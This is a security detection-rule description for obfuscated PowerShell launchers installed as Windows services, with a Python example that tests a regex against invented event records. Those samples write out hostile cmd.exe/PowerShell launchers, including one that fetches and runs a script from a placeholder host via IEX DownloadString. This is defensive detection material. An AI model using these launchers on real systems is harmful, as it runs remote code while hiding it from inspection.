
Summary
This detection rule looks for obfuscated PowerShell that is delivered through standard input (stdin) and installed as a Windows service. It matches Security log `EventID` 4697 ("A service was installed in the system") and inspects the `ServiceFileName` field, which records the binary path or command line registered for the new service. The rule fires when that value carries the markers of a cmd.exe stdin launcher of the kind Invoke-Obfuscation generates: `set` statements chained with `&&`, together with a reference to `environment` (as in `[Environment]::GetEnvironmentVariable`), `invoke` (as in `Invoke-Expression`) or PowerShell's `${input}` automatic variable, which receives whatever is piped into the process on stdin. Staging the payload in environment variables and feeding it to PowerShell over stdin keeps the script body out of the PowerShell command line, which is why the rule keys on the launcher's structure rather than on the payload itself. Because `EventID` 4697 is only written when the 'System Security Extension' audit subcategory is enabled, the rule depends on that audit setting; without it the same installation is still recorded as `EventID` 7045 in the System log, which this rule does not read. Obfuscation tooling changes its output frequently, so the keyword list should be treated as a set of indicators to tune rather than an exhaustive signature.
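The matching logic described above, run over a handful of constructed EID 4697 records, as an added example that is not part of the original rule or page. The regular expression is rebuilt from the keywords the summary lists (`set`, `&&`, `environment`, `invoke`, `${input}`) and is an approximation of the rule, not a copy of it; the sample events, service names and URL are invented for illustration, and the `extract_set_vars` helper is an added triage aid, not something the rule does.

```python
import re

# Assumption: rebuilt from the keywords the summary lists; an approximation of
# the rule's pattern, not the rule itself. It targets a cmd.exe one-liner that
# stages text in an environment variable with `set`, chains a second `set`
# with `&&`, and then hands the staged text to PowerShell via stdin ($input),
# [Environment]::GetEnvironmentVariable or Invoke-Expression.
STDIN_LAUNCHER_RE = re.compile(
    r'(set).*&&\s?set.*(environment|invoke|\$\{?input).*&&.*"',
    re.IGNORECASE,
)

# Added triage helper (not part of the rule): pull `set NAME=VALUE` pairs out
# of the launcher. The first variable usually holds the real PowerShell payload.
SET_VAR_RE = re.compile(r'set\s+([^=\s]+)=(.*?)(?=&&|"$)', re.IGNORECASE)

# Constructed sample events, not real telemetry. Field names follow the
# Security log: EID 4697 carries the registered binary in ServiceFileName.
# The last record is a System log EID 7045, which stores the same data in
# ImagePath and is outside this rule's scope.
SAMPLE_EVENTS = [
    {"EventID": 4697, "ServiceName": "WinUpdHelper",
     "ServiceFileName": r'''cmd.exe /c "set qRz=IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')&&set xYt=echo [Environment]::GetEnvironmentVariable('qRz')^|powershell -nop -&&cmd /c %xYt%"'''},
    {"EventID": 4697, "ServiceName": "TelemetryCache",
     "ServiceFileName": r'''cmd /c "set aB=Write-Host 'beacon'&&set cD=echo %aB% ^| powershell -nop -c "${input}|iex"&&cmd /c %cD%"'''},
    {"EventID": 4697, "ServiceName": "NetSvcHost",
     "ServiceFileName": r"C:\Windows\system32\svchost.exe -k netsvcs"},
    # Benign path that contains the substring "set" but no launcher structure.
    {"EventID": 4697, "ServiceName": "SetupSvc",
     "ServiceFileName": r'"C:\Program Files\Setup\setsvc.exe" --config C:\ProgramData\setsvc\settings.ini'},
    {"EventID": 7045, "ServiceName": "PerfCache",
     "ImagePath": r'''cmd /c "set k=Write-Host 1&&set o=echo Invoke-Expression (Get-ChildItem Env:k).Value ^| powershell -&&cmd /c %o%"'''},
]


def is_stdin_launcher(service_file_name: str) -> bool:
    """True when the registered binary looks like a set/&&/stdin PowerShell launcher."""
    return STDIN_LAUNCHER_RE.search(service_file_name) is not None


def extract_set_vars(service_file_name: str) -> dict:
    """Map each cmd.exe `set` variable in the launcher to the text staged in it."""
    return {name: value for name, value in SET_VAR_RE.findall(service_file_name)}


def detect(events) -> list:
    """Apply the rule's scope (Security EID 4697 only) and return the service names that fire."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4697:
            # EID 7045 in the System log records the same install, but the rule
            # only reads 4697, so it is skipped here even if the path matches.
            continue
        if is_stdin_launcher(ev.get("ServiceFileName", "")):
            hits.append(ev["ServiceName"])
    return hits


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        if ev["EventID"] == 4697 and ev["ServiceName"] in detect(SAMPLE_EVENTS):
            print(ev["ServiceName"], extract_set_vars(ev["ServiceFileName"]))
```

Running the block reports only the two 4697 records whose `ServiceFileName` has the launcher shape; the `setsvc.exe` path shows that the bare keyword `set` is not enough on its own, and the 7045 record shows why the audit subcategory matters: the same launcher is visible there, but this rule never sees it.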
Categories
- Windows
- Endpoint
Data Sources
- Windows Registry
- Process
- Application Log
Created: 2020-10-12